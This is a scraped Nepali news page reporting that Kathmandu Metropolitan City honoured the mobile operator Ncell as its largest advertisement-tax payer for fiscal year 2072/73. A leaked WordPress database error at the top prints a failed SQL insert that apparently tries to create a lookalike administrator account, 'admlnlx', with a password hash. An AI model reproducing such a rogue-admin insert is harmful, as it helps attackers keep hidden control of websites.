WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBfA0n2Bag2KyVH2nwz84lZ9HJ2E/A0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 07:42:42', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २६–
काठमाडौं महानगरपालिकाले देशकै अग्रणी जिएसएम मोबाईल सेवा प्रदायक कम्पनी एनसेललाई गत आर्थिक वर्षमा सबैभन्दा बढि विज्ञापन कर बुझाएबापत सम्मान गरेको छ । काठमाडौं महानगरपालिकाकार्यलयले एनसेललाई सोमबार सो सम्मान स्वरुपकदर पत्रप्रदान गरेको छ ।
काठमाडौं महानगरपालिकाको २९ औं महानगर परिषदबाट पारित बजेट, नीतितथाकार्यक्रम सार्वजनिकीकरण समारोहमासो सम्मानप्रदानगरिएको हो । उक्त समारोहका प्रमुख अतिथी संघीय मामिला तथा स्थानीय विकास मन्त्रि हितराज पाण्डेले एनसेलका सुरक्षा निर्देशक महेन्द्र भट्टचनलाई सो कदर पत्र हस्तान्तरण गरेका थिए ।
कदर पत्रमा लेखिए अनुसार “काठमाडौं महानगरपालिका कार्यलयलाई आर्थिक वर्ष २०७२/२०७३ मा विज्ञापन कर तर्फ सबैभन्दा बढि भुक्तानी गरी महानगर निर्माणमा अतुलनिय योगदान गरे बापत”एनसेललाई सम्मान गरिएको हो । महानगरपालिका कार्यलयका अनुसार, गत आर्थिक वर्ष २०७२/२०७३ मा कार्यलयले रु ४ करोड १७ लाख विज्ञापन कर संकलन गरेको थियो । कुल संकलित विज्ञापन करको १ तिहाई योगदान एनसेलले गरेको थियो ।
निजी क्षेत्रको पहिलो मोबाईल सेवा प्रदायक कम्पनी एनसेलले विभिन्न समयमा सरकारबाट सर्वोत्कृष्ट करदाता, सर्वोत्कृष्ट आयकर दातालगायतको सम्मान पाईसकेको छ । नेपाल दूरसंचार प्राधिकरणले सार्वजनिक गरेको पछिल्लो जानकारी अनुसार १ करोड ४३ लाख नेपालीले एनसेलको सेवा लिएका छन् ।